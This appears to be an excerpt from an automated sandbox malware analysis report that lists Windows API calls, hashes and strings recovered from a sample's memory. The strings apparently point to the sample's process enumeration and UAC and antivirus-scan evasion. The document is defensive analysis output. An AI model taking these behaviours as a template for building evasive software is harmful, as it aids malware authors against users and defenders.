                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                  • Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                                                  • Instruction ID: c8e8c80697dc246133a213394903ecdab00a664f2b9a9329d9edda8d5ef21264
                                                                                                                                  • Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                                                  • Instruction Fuzzy Hash: 79D05B763085107AE320A55B5CC4EBB5BDCDFC5770F500639B558C3180D720DC018371
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
                                                                                                                                  • Instruction ID: 0a858b245b2ddc722f34714d59f9bc3e3b3af3e132bf98f646b95fea39b32cca
                                                                                                                                  • Opcode Fuzzy Hash: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
                                                                                                                                  • Instruction Fuzzy Hash: 0BC08CAC311A00072B5471FF0DC413A068899282393A40FA1A438C31E2D322F0A33024
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0424062B,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,ScanString), ref: 041E8E0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                                                  • Instruction ID: 6e7c6cc37fa49dbe00f9c28aae15d260c4376eb70caf6bafa4e8e652ec4520e7
                                                                                                                                  • Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
                                                                                                                                  • Instruction Fuzzy Hash: 03C04CA9711A000E6F94B5FF1DC457A06C84A552397A42FA1E469D31E2D726B4672510
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                  • Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                                                  • Instruction ID: 63c5d4231c4749795292152850626774489b9e0cd4e1072cb2859a119779e150
                                                                                                                                  • Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                                                  • Instruction Fuzzy Hash: EEC012B9A51A301BFB319A9E9CC0B6563DC9B49655F5800E1E504EB240E370F8004350
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
                                                                                                                                  • SysReAllocStringLen.OLEAUT32(04248B50,0423C89C,00000016), ref: 041E4FBE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                                                  • Instruction ID: 786f92dc18ffb3777e13ff190147808f2afe256af9fcec848c92fa70a03de677
                                                                                                                                  • Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
                                                                                                                                  • Instruction Fuzzy Hash: C7D0126C904E0269AE2C552F49D483A6269AAD1B0179A82DC5802571C0E735F440D664
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,04248704,00000000,00000001), ref: 04248720
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Eventtime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2982266575-0
                                                                                                                                  • Opcode ID: fc77a7158173404f2b06ff58244cbd88d3e1d579a0130e88cf6f26fcf25da26f
                                                                                                                                  • Instruction ID: da4b484e3eeef69cdfeaad8880479ca1a4543fd0ad469b7384de6aade078d100
                                                                                                                                  • Opcode Fuzzy Hash: fc77a7158173404f2b06ff58244cbd88d3e1d579a0130e88cf6f26fcf25da26f
                                                                                                                                  • Instruction Fuzzy Hash: 89C092FC3A5300BAFA1066A61CE2F73158CE348B2CF105461F602EE2C2D2E6AD0046A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 041E4F47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2525500382-0
                                                                                                                                  • Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                                                  • Instruction ID: 553d02c61c7b3bac6fc625545f97fad90491d5b7ccec166406982beb26df779b
                                                                                                                                  • Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                                                  • Instruction Fuzzy Hash: B8B0122C30CE4220FE1020A70DC0B36029C1F00A44FC500D0AE18C00C6EB18F4156035
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 041E4F5F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                  • Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                                                  • Instruction ID: 1fc26b2e463578ffdb1818a497ad4653a89bb1f0f46c5b4e661f9b55a1a77583
                                                                                                                                  • Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                                                  • Instruction Fuzzy Hash: 9EA022AC000F0328AF0B323F08C0A3A22323FC0A083ECC0E800002A0008F3AB000C0A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 041FE99A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 89dc09eff5eb1cde181ade33ff8ad1be0045d59752270cf94872d845a2cc7225
                                                                                                                                  • Instruction ID: 360383f6ad434b7eb6c6abfb94082d22c1ca2be9053ca179f29c97912ca0c393
                                                                                                                                  • Opcode Fuzzy Hash: 89dc09eff5eb1cde181ade33ff8ad1be0045d59752270cf94872d845a2cc7225
                                                                                                                                  • Instruction Fuzzy Hash: 8D1145347407068BE750DF19C8C0B96F7E5FB883A0B10862AEA998B795D374F9058BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,041E1A9F,?,041E209C), ref: 041E167E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: d0e79a16a76307a23b2372c67dd70f0f334ae3bc920dff1c345b159f9dfa5f3f
                                                                                                                                  • Instruction ID: 6b30265daa761ad3e0a965cbc416e9afabdb1c4bfadceeb4fde478dd40a8c793
                                                                                                                                  • Opcode Fuzzy Hash: d0e79a16a76307a23b2372c67dd70f0f334ae3bc920dff1c345b159f9dfa5f3f
                                                                                                                                  • Instruction Fuzzy Hash: 81F0F9F07113005FEB06DF7AAD847167AE2E7C9349F1481B9D609DB398E775A801CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,041E209C), ref: 041E1740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 81a167e81582a631c5da463713bf004b23bdbb1ed304f8a0f33c8037ffd822d6
                                                                                                                                  • Instruction ID: 210ea185bc5db998551846aceb1611ef28a651868e0c9f9d3ebc5e3d3f99c4f6
                                                                                                                                  • Opcode Fuzzy Hash: 81a167e81582a631c5da463713bf004b23bdbb1ed304f8a0f33c8037ffd822d6
                                                                                                                                  • Instruction Fuzzy Hash: 4EF0FAF6B00B507BE3108F4EACC0B96BBA0FB00361F040179FA0897340D3B0AC408B94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,041E2080), ref: 041E17A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                  • Opcode ID: 0cdc9ede0810c0f42f775f19c30c07cc6c0a463f78d1b1c9a430ec58032d6b88
                                                                                                                                  • Instruction ID: 095ce39a466e74553aa2175e40f2164f8e7ed01b0bdc72ef559540d51f4d4948
                                                                                                                                  • Opcode Fuzzy Hash: 0cdc9ede0810c0f42f775f19c30c07cc6c0a463f78d1b1c9a430ec58032d6b88
                                                                                                                                  • Instruction Fuzzy Hash: 1DE04FB93007017EE7101E7E5D84B666AD8EB48A65F1444A5F641DB241D770B84087A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,04238AA7,?,?,04238B39,00000000,04238C15), ref: 04238834
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0423884C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0423885E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 04238870
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 04238882
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 04238894
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 042388A6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 042388B8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 042388CA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 042388DC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 042388EE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 04238900
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 04238912
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 04238924
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 04238936
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 04238948
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0423895A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                                  • Opcode ID: 1a63a79f3dff38bb8c1474280147246bb8f0d8649166a1f95e4e2b919a3b74a3
                                                                                                                                  • Instruction ID: df813370a654f3ca85807eeabbf50c12a8f0fd8e263b9700e3a90e4a60495efb
                                                                                                                                  • Opcode Fuzzy Hash: 1a63a79f3dff38bb8c1474280147246bb8f0d8649166a1f95e4e2b919a3b74a3
                                                                                                                                  • Instruction Fuzzy Hash: 203146F4B50B50AFEF00EBB9A8C9A7937F9EB1571A78005A5B414DF204D778A844CF1A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetObjectA.GDI32(00000000,00000054,?), ref: 04204FFC
                                                                                                                                  • GetDC.USER32(00000000), ref: 0420500D
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0420501E
                                                                                                                                  • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0420506A
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0420508E
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 042052EB
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0420532B
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04205337
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 042053A0
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 042053BA
                                                                                                                                  • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,04205548,?,00000000,0420556A,?,00000000,0420557B), ref: 04205402
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 04205388
                                                                                                                                    • Part of subcall function 04201CEC: GetSysColor.USER32(?), ref: 04201CF6
                                                                                                                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 04205424
                                                                                                                                  • CreateCompatibleDC.GDI32(00000028), ref: 04205437
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0420545A
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 04205476
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04205481
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0420549F
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 042054B9
                                                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 042054E1
                                                                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 042054F3
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042054FD
                                                                                                                                  • DeleteDC.GDI32(?), ref: 04205518
                                                                                                                                    • Part of subcall function 04202AA8: CreateBrushIndirect.GDI32(?), ref: 04202B53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1299887459-0
                                                                                                                                  • Opcode ID: 1fb194d666bd1467f41075010cfd8e1fb7c56d8d7bc2c96337b9bd6eae84f527
                                                                                                                                  • Instruction ID: 12430151c562afb36591f5a4a08f5a3c1479a08b8f6e9d43644f21a20bca86cb
                                                                                                                                  • Opcode Fuzzy Hash: 1fb194d666bd1467f41075010cfd8e1fb7c56d8d7bc2c96337b9bd6eae84f527
                                                                                                                                  • Instruction Fuzzy Hash: 9A12C575A10209AFDB10EFA9C884FAEB7F9EF08314F558455F914EB292C775E980CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                  • API String ID: 0-2963190186
                                                                                                                                  • Opcode ID: 4b17d312b1b093411ac138c37fc07228bb47f6af705baf4ab5fcd83b0b3db227
                                                                                                                                  • Instruction ID: f10e77e84f55ad99a9a46c477bc0f75886e9ac8015fc4c2c77ed62124df94113
                                                                                                                                  • Opcode Fuzzy Hash: 4b17d312b1b093411ac138c37fc07228bb47f6af705baf4ab5fcd83b0b3db227
                                                                                                                                  • Instruction Fuzzy Hash: 33E14CB5B24205EFEB14DB68C584AADB7F2AF08316F1881A4EC159B251D774FF84DB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5C35
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 041E5C4C
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 041E5C7C
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5CE0
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D16
                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D29
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D3B
                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000,0424A794), ref: 041E5D47
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18,041E0000), ref: 041E5D7B
                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,041E7A18), ref: 041E5D87
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 041E5DA9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                  • API String ID: 3245196872-1565342463
